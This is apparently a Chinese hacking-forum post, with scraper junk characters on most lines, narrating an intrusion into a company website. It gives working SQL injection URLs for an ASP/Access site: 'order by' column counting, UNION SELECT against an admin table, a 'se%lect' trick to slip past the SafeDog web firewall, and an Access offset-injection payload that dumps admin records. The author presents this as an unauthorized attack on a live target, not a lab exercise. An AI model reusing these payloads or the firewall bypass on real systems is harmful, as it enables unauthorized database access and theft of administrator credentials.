打开网站,一个企业站。 t, l0 Q- P# }. T( D# ]; e
9 S* s% g$ c# \0 e3 G' `# X
/ }* I y" ?% ^" f7 w9 u7 J
顺手加个admin! [" t4 i0 B) O8 q4 i+ `
0 x5 b5 a# ?3 T$ Q
1 z5 ~2 _0 g6 _2 n
默认后台。 F, C/ i% p) b
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
5 R$ s7 v! b) b! d# S# G
. y; d: G& \- O; s
) q) I4 p v3 `* G1 C, s# W
' A% r. i# a5 @9 O# p3 t1 k3 f& \所以就不用御剑扫了,待会直接封IP。) |0 w' Y; H5 E% J
/ S+ k: Q1 }4 {& f, m
用order by语句判断是否存在注入。& v8 C" w/ ^! {, E
http://www.xxx.com /product_show.asp?id=997 order by 1
6 f* Z# N5 M0 r6 @7 I& n5 @% r6 ehttp://www.xxx.com /product_show.asp?id=997 order by 100
8 X6 X7 ?5 c( j2 S: }- O6 {现在存在注入,经测试后发现是9个字段。/ a. K e$ p; z8 c4 Z
# L {( X0 |% c5 }9 n9 \3 [# [
接下来进行联合查询,猜是否存在admin表。
. {+ W% o! C2 ]# d" Jhttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。2 k+ F8 i* `! [" Z: ?3 c5 h
- G5 Y6 M9 L& N0 `' ^7 N9 k8 _
, i) y) q* ~. n' h8 ?: ~ U* q1 }- w: d _$ \8 E0 }! @
在select中间加个%,se%lect绕过安全狗。
# F, y, u8 P. k# L2 a1 Z# L
9 g$ K8 `0 I7 Q) Z! w# A' ~
5 c7 O' A+ p3 x* b: H. K3 l" \发现存在admin表,然后开始手工猜常用的字段。8 I$ |8 D8 E! K; S5 i1 |) _
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
$ n- Y+ _2 L1 b0 z
+ X! t U, \! B突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。$ a9 i: X& r9 h
0 O8 J& @, ^9 a: S' I4 c6 d科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。 i' ]! | x1 u% \, l3 e, b
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin$ J* a. ?, o. k# {$ g+ Y
好了,敏感内容出显了。' [" q/ _' P, ~8 _2 [. w9 I" ?
' C5 z* _2 I/ }0 \7 x% T5 O3 E/ Y4 g7 `% U
$ V& O+ s0 ~) r% q, Q9 a7 L9 ^
|